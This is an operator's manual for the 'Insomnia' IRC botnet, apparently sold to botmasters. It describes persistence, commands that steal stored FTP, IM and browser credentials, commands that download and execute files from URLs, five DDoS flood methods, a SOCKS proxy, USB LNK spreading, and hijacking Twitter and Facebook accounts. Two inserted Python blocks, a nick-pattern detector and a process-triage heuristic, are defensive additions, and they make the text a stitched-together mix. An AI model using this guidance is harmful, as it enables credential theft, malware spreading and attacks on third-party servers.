Table of Contents

1. Summary
2. Core Features
3. Malware Removal
4. SOCKS5
5. DDoS
6. Spreading Modules
7. Topic Generator Explained
8. Complete command list

Summary

Insomnia was developed in Visual Studio 2010 in C#. The binary is compiled against version 2.0 of the .NET Framework. Insomnia is primarily intended for a botmaster who plans to build a network out of machines that already have the .NET Framework installed. Infection of newer operating systems was considered during development: Insomnia is fully compatible with the Windows 8 Developer Preview at this time and should work on the release builds. Insomnia has been tested on the following Windows NT based operating systems:

Windows XP
Windows Server 2003 / R2
Windows Vista
Windows Server 2008 / R2
Windows 7
Windows 8 Developer Preview

If Insomnia acquires administrative rights on the target machine, it installs its autorun entry under HKLM rather than HKCU, so it is executed under every user account on the machine. It also uses certain Windows API calls that only work with elevated privileges, which improves some of the malware removal features such as Ruskill.

On execution, Insomnia looks up its country from http://api.wipmania.com. If that site cannot be reached, Insomnia falls back to the system locale.

Insomnia's nick is generated from several pieces of information. Here is a breakdown of an example nick:

n{US|XP-32a}dnskifj

The leading lowercase 'n' means Insomnia was installed within the past hour, i.e. this is most likely a fresh installation. Next comes the GeoIP country code of the machine, US for the United States, followed by the Windows version and bitness (Windows XP, 32-bit). The lowercase 'a' means the bot is running with administrative privileges.
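The nick format above (together with the 'u' variant for standard users and the seven trailing random characters described next) is a usable network indicator. The following Python is an added example written for this page, not code from Insomnia or its manual: it decodes the nick fields and runs the check over a few constructed IRC log lines. The regular expression, the assumed alphanumeric alphabet for the random suffix, and the OS tokens in the sample lines (W7, 2K3) are assumptions, since the manual only shows the XP-32 example.

```python
import re
from typing import Optional

# Assumed grammar for the nick described in the Summary, e.g. n{US|XP-32a}dnskifj
#   n        optional: installed within the past hour
#   US       two-letter GeoIP country code
#   XP-32    Windows version token and bitness
#   a | u    running as admin / standard user
#   dnskifj  seven random characters (assumed alphanumeric; the manual only
#            shows lowercase letters)
NICK_RE = re.compile(
    r"^(?P<new>n)?"
    r"\{(?P<country>[A-Z]{2})\|(?P<os>[^|}\-]+)-(?P<bits>32|64)(?P<priv>[au])\}"
    r"(?P<rand>[A-Za-z0-9]{7})$"
)

# Two places a nick shows up in IRC traffic: the message prefix
# ":nick!user@host ..." on server-to-client lines, and the client's own
# "NICK <nick>" registration command.
PREFIX_RE = re.compile(r"^:(?P<nick>[^!\s]+)!")
NICK_CMD_RE = re.compile(r"^NICK\s+:?(?P<nick>\S+)")


def parse_nick(nick: str) -> Optional[dict]:
    """Return the decoded fields if `nick` matches the Insomnia pattern, else None."""
    m = NICK_RE.match(nick)
    if not m:
        return None
    return {
        "new_install": m.group("new") == "n",
        "country": m.group("country"),
        "os": m.group("os"),
        "bits": int(m.group("bits")),
        "admin": m.group("priv") == "a",
        "random": m.group("rand"),
    }


def scan_irc_log(lines):
    """Return a list of (line_no, nick, fields) for every line carrying a matching nick."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = PREFIX_RE.match(line) or NICK_CMD_RE.match(line)
        if not m:
            continue
        fields = parse_nick(m.group("nick"))
        if fields:
            hits.append((line_no, m.group("nick"), fields))
    return hits


# Constructed sample traffic (not captured from a real infection).
SAMPLE_LOG = [
    ":n{US|XP-32a}dnskifj!insomnia@10.0.0.5 JOIN #US",
    "NICK {DE|W7-64u}qz8k2vb",
    ":alice!alice@example.org PRIVMSG #chat :hello",
    ":n{US|XP-32a}dnskifj!insomnia@10.0.0.5 PRIVMSG #US :[SOCKS]: Listening on [127.0.0.1:9001] [user:pass] [uPnP=yes]",
    ":{RU|2K3-32a}abc1234!bot@10.0.0.9 QUIT :Windows is shutting down...",
]

if __name__ == "__main__":
    for line_no, nick, fields in scan_irc_log(SAMPLE_LOG):
        flags = ("new " if fields["new_install"] else "") + ("admin" if fields["admin"] else "user")
        print(f"line {line_no}: {nick} -> {fields['country']} {fields['os']}-{fields['bits']} {flags}")
```

The country and privilege fields are what make this worth decoding rather than just matching: a sorted channel (#US, #admins) populated by nicks that decode cleanly is a much stronger signal than any single nick.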
A lowercase 'u' in place of the 'a' means the bot is running as a standard user. The remaining seven characters are generated randomly to avoid nick collisions.

Core Features

Connection Information

Insomnia supports the IRC protocol with and without SSL (Secure Sockets Layer). SSL is recommended: plaintext IRC connections are easily recognized, which puts Insomnia at risk of detection and exposes everything exchanged on your network. Insomnia can be compiled to support multiple servers on request; there is currently no limit on their number.

Quit Messages

IRC quit messages are decided by listening for WM_QUERYENDSESSION. This lets Insomnia report the reason the process is terminating when a Windows session is ending. If the bot process is terminated abnormally or no reason can be determined, the quit message is the standard "Connection reset by peer". Insomnia currently detects and sends three quit messages:

Windows is shutting down...
Windows is logging off...
Windows is going to sleep...

Registry Persistence

Insomnia actively monitors the registry for changes by P/Invoking Windows API functions such as RegNotifyChangeKeyValue. If it finds that its registry key has been modified or deleted, it restores it immediately.

Core command list

These commands are part of the basic build of Insomnia and are included in every binary available for purchase, without any separate modules. The remaining commands are covered in their own sections below; a complete command list is on the last page of this document.

Command              Description
.v                   Outputs version, MD5 hash, process path and registry location.
.m on/off            Toggles mute (blocks all output).
.avinfo              Displays the currently installed antivirus/firewall programs (Vista+).
.j #channel          Joins a channel.
.p #channel          Parts a channel.
.sort                Sorts bots into channels by country (#US, #RU, etc.).
.unsort              Parts the sorted channels.
.permsort            Sorts bots by privilege level (#users / #admins).
.rm                  Completely removes Insomnia from the machine.
.rc                  Reconnects to IRC after waiting 10 seconds.
.ftp                 Outputs saved FTP credentials from the machine.
.im                  Outputs saved IM credentials from the machine.
.read URL            Reads encrypted topic commands from a remote URL.
.open FILE/URL       Opens a URL or file on the machine.
.open FILE/URL -h    Opens a URL or file on the machine with the window hidden.
.dl URL              Downloads a file and executes it.
.dl URL -m           Downloads a file and executes it in memory (.NET files only).
.dl URL -t X         Downloads a file, executes it and terminates it after X seconds have passed.

Malware Removal

Botkiller

Insomnia includes two malware removal commands:

Command   Description
.bk       Runs the standard botkiller module.
.bk -i    Runs the botkiller module that terminates injected bots.

The standard botkiller module works on a counter system. It first scans temporary folders, including %APPDATA%, for executables that are currently running, then checks whether each file has the "hidden" attribute. Further checks follow, including the registry startup locations. If an executable fails a certain number of these checks it is considered "possibly malicious": Insomnia terminates it, deletes its registry key and outputs any TCP connections associated with the process.

The injected-bot botkiller uses a series of techniques to remove nearly all bots that inject into explorer.exe or iexplore.exe. The two commands perform different actions; for the best effort at cleaning a system of other common malware, run both.

Ruskill

Command      Description
.dl URL -r   Starts the download and runs the Ruskill module on the file.

Ruskill is enabled by passing the -r parameter to the download command.
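The counter system of the standard botkiller, described above, is the same kind of scoring heuristic an incident responder's triage script uses. The Python below is an added example written for this page, not Insomnia's own code: it scores constructed process records on the three checks the manual names (image running from a temporary or %APPDATA% location, hidden attribute, presence in a registry startup location) and selects those at or above a threshold. The record layout, the list of temporary roots and the threshold of 2 are assumptions; the manual gives none of them.

```python
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class ProcRecord:
    """One running executable as a scan would see it (constructed layout, assumed)."""
    pid: int
    path: str
    hidden: bool                 # FILE_ATTRIBUTE_HIDDEN set on the image file
    in_run_key: bool             # image path appears under a Run/RunOnce key
    tcp_connections: List[Tuple[str, int]] = field(default_factory=list)


# Assumed set of "temporary" locations the scan covers; the manual names
# %APPDATA% and temporary folders without listing them.
SUSPECT_ROOTS = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
)

# Assumed threshold: the manual only says "a certain number" of checks.
THRESHOLD = 2


def score_process(p: ProcRecord) -> int:
    """Count how many of the three checks the process fails."""
    path = p.path.lower().replace("/", "\\")
    score = 0
    if path.endswith(".exe") and any(root in path for root in SUSPECT_ROOTS):
        score += 1            # running out of a temp / AppData location
    if p.hidden:
        score += 1            # image file carries the hidden attribute
    if p.in_run_key:
        score += 1            # registered in a startup location
    return score


def triage(records, threshold=THRESHOLD):
    """Return the records the counter system would treat as possibly malicious."""
    return [p for p in records if score_process(p) >= threshold]


def report(p: ProcRecord) -> str:
    """Summarise a flagged process with its TCP connections (output format assumed)."""
    conns = ", ".join(f"{host}:{port}" for host, port in p.tcp_connections) or "none"
    return f"pid {p.pid} {p.path} score={score_process(p)} tcp=[{conns}]"


# Constructed process list; none of these paths come from a real system.
SAMPLE_PROCS = [
    ProcRecord(1234, r"C:\Users\bob\AppData\Roaming\svchost.exe", True, True, [("10.0.0.5", 6667)]),
    ProcRecord(2000, r"C:\Program Files\Vendor\updater.exe", False, True),
    ProcRecord(3000, r"C:\Users\bob\AppData\Local\Temp\setup.exe", False, False),
    ProcRecord(4000, r"C:\Windows\Temp\dropper.exe", True, False),
]

if __name__ == "__main__":
    for p in triage(SAMPLE_PROCS):
        print(report(p))
```

Run stand-alone, the block flags pids 1234 and 4000. The threshold is the tuning knob: at 3 only the first record is selected, and at 1 a legitimate updater in a Run key or an installer running from %TEMP% is flagged too, which is exactly the false-positive trade-off a counter-style heuristic makes.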
Files downloaded with Ruskill enabled are monitored, and the findings are output to the Ruskill channel. Ruskill attempts to discover every file dropped by the malware and every registry key it creates, and then reverses those changes on the next reboot. It does this with a set of Windows API calls that delete the target files after AUTOCHK has run but before Windows creates any page files. Administrative rights affect how well this feature works. Ruskill uses API calls similar to those in ngrBot, Autumn, various antivirus products and File Assassin.

DDoS Functionality

Insomnia includes five methods of launching distributed denial of service attacks. Two of them target the Apache web server specifically, exhausting its sockets and memory. Before starting a new DDoS command, Insomnia stops all other active DDoS threads. This frees threads for the new command and avoids consuming too many resources on the client or saturating its upstream, which could cause the bot to disconnect temporarily.

Command                   Description
.arme HOST TIME           Multithreaded Apache Remote Memory Exhaustion flood.
.slow HOST TIME           Multithreaded Slowloris flood.
.layer4 HOST PORT TIME    Multithreaded Layer 4 (SYN) flood.
.layer7 HOST PORT TIME    Multithreaded Layer 7 (HTTP GET) flood.
.udp HOST PORT TIME       Multithreaded UDP flood.

ARME (Apache Remote Memory Exhaustion)

This method was discovered in late 2011 and is a modified port of Kingcope's Perl script. Run with enough connections it can make Apache swap to disk once RAM is exhausted, and the process may be terminated as the host becomes unstable. Higher-end servers and properly configured Apache installations may not be vulnerable.

Slowloris

This method was developed by RSnake and became popular in 2009. This C# port works the same way but uses random User-Agent strings, random Content-Length values and random header data, which makes it harder to block on the target. It also uses both GET and POST requests, which seems to give better results than either alone. Slowloris can take a while to consume all the sockets on the target, but it always wins in the end.

Layer 7 (HTTP GET)

This method simply issues HTTP GET requests for the index page and downloads the page data. It works well in high numbers. If you are targeting Apache web servers with a small number of bots, the two methods above are recommended.

Layer 4 (SYN)

This method uses SYN sockets to flood the target with TCP connection attempts. It is an older method and not hard to block server-side, but it is highly effective where the target is vulnerable.

UDP

This flood sends UDP packets filled with random data. It is ideal against home connections, or against larger servers if you have enough bots.

SOCKS5 Module

Command   Description
.socks    Attempts to start the SOCKS5 server and reports the result.

This command signals Insomnia to start the SOCKS5 server and test its connection. If everything works without errors, it outputs IP:PORT and USER:PASS to IRC so you can use the proxy. It also attempts to map the port with the included UPnP library and indicates in the output whether that succeeded.

[SOCKS]: Attempting to start SOCKS server...
[SOCKS]: Listening on [127.0.0.1:9001] [user:pass] [uPnP=yes]

Spreaders

USB .LNK Spread

This module runs automatically. On initial execution the bot scans for removable USB media. When a drive is found, it scans the drive for folders, creates corresponding LNK files and hides the originals. It also listens for new devices and infects them as they are inserted. The module reports to IRC after each successful infection:

[USB]: Completed LNK spread on (G:\) with 7 files.
Twitter

Command          Description
.twitter "msg"   Updates the Twitter status of accounts found on the system.

This module queries the Chrome grabber for accounts matching twitter.com and attempts to log in with them. If login succeeds, it updates the account's status to the specified message. This does NOT use the Twitter API and does NOT require OAuth; it simulates the HTTP requests a real browser makes to log in to Twitter and post a status update.

[TWITTER]: Status updated. (user@email.com => "msg")

Facebook

Command           Description
.facebook "msg"   Starts the Facebook spread module with the specified message.

This module queries the Chrome grabber for accounts matching facebook.com and attempts to log in with them. If login succeeds, it gathers the account information needed to log in to Facebook chat over XMPP. Once that data has been acquired, the web resources are released and a chat session is started with the user's credentials. With access to the chat system, the module sends your message according to the given options. You can restrict delivery to online-only or offline-only friends with the corresponding parameters, and you can limit delivery to a given number of randomly chosen friends with the -f parameter followed by a number.

[FACEBOOK]: Spreader module started. (user@email.com => "msg")

Topic Generator

Insomnia ships with a topic generation utility that protects your topic commands from prying eyes and simplifies commands that must run in a specific order. Run the topic generator included with your purchase. Each customer's topic generator encrypts with that customer's unique ID, so nobody else's generator can interact with a binary compiled with your customer ID. To use it, type the commands exactly as you would in IRC, then click Add.
The topic generator adds them to the list view, automatically parsing and detecting the parameters. When you are finished, click Generate and set the result as the topic in IRC. If a topic exceeds the IRC topic length limit, host the encrypted commands on a web server and set the topic to the encrypted form of:

.read http://yoururl.com/commands.txt

Complete Command List

Command                   Description
.v                        Outputs version, MD5 hash, process path and registry location.
.m on/off                 Toggles mute (blocks all output).
.avinfo                   Displays the currently installed antivirus/firewall programs (Vista+).
.j #channel               Joins a channel.
.p #channel               Parts a channel.
.sort                     Sorts bots into channels by country (#US, #RU, etc.).
.unsort                   Parts the sorted channels.
.permsort                 Sorts bots by privilege level (#users / #admins).
.rm                       Completely removes Insomnia from the machine.
.rc                       Reconnects to IRC after waiting 10 seconds.
.ftp                      Outputs saved FTP credentials from the machine.
.im                       Outputs saved IM credentials from the machine.
.read URL                 Reads encrypted topic commands from a remote URL.
.open FILE/URL            Opens a URL or file on the machine.
.open FILE/URL -h         Opens a URL or file on the machine with the window hidden.
.dl URL                   Downloads a file and executes it.
.dl URL -m                Downloads a file and executes it in memory (.NET files only).
.dl URL -t X              Downloads a file, executes it and terminates it after X seconds have passed.
.dl URL -r                Downloads a file with Ruskill and outputs to the Ruskill channel.
.socks                    Attempts to start the SOCKS5 server.
.speedtest URL            Downloads the URL and outputs speed information.
.bk                       Standard botkiller module.
.bk -i                    Injected botkiller module.
.getadmin                 Added by request. Prompts UAC for admin rights and, if acquired, restarts.
.acc keyword              Chrome grabber based on URL keyword. Leave keyword blank for all.
.arme HOST TIME           Multithreaded Apache Remote Memory Exhaustion flood.
.slow HOST TIME           Multithreaded Slowloris flood.
.layer4 HOST PORT TIME    Multithreaded Layer 4 (SYN) flood.
.layer7 HOST PORT TIME    Multithreaded Layer 7 (HTTP GET) flood.
.udp HOST PORT TIME       Multithreaded UDP flood.